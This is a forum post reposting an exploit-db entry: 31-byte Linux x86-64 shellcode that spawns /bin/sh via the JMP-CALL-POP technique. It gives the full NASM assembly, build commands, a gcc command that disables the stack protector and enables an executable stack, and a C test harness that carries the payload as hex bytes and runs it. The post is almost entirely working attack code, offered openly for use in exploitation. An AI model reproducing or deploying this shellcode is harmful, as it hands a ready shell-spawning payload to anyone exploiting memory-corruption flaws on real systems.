Massaro Posted June 6, 2017 Report Share Posted June 6, 2017 /* ;Title: Linux/x86-64 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) ===COMPILATION AND EXECUTION=== #nasm -f elf64 shell.asm -o shell.o #ld shell.o -o shell <=== Making Binary File #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) =================SHELLCODE(INTEL FORMAT)================= section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh" ===================END HERE============================ Compile with gcc with some options. # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; main() { printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); printf("Shellcode Length : %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); } Sursa: https://www.exploit-db.com/exploits/42126/. 1 Quote Link to comment Share on other sites More sharing options...
